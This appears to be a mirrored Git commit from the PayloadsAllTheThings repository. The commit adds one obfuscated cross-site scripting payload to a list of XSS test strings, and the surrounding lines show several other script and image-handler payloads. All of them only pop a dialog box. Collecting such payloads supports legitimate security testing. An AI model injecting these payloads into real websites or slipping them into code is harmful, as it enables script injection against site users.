mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
Update README.md
This commit is contained in:
parent
eddc716d8c
commit
ee12f8e480
@ -160,6 +160,7 @@ Most tools are also suitable for blind XSS attacks:
|
||||
"><script>alert(String.fromCharCode(88,83,83))</script>
|
||||
<script>\u0061lert('22')</script>
|
||||
<script>eval('\x61lert(\'33\')')</script>
|
||||
<script>eval(8680439..toString(30))(983801..toString(36))</script> //parseInt("confirm",30) == 8680439 && 8680439..toString(30) == "confirm"
|
||||
|
||||
// Img payload
|
||||
<img src=x onerror=alert('XSS');>
|
||||
|
Loading…
Reference in New Issue
Block a user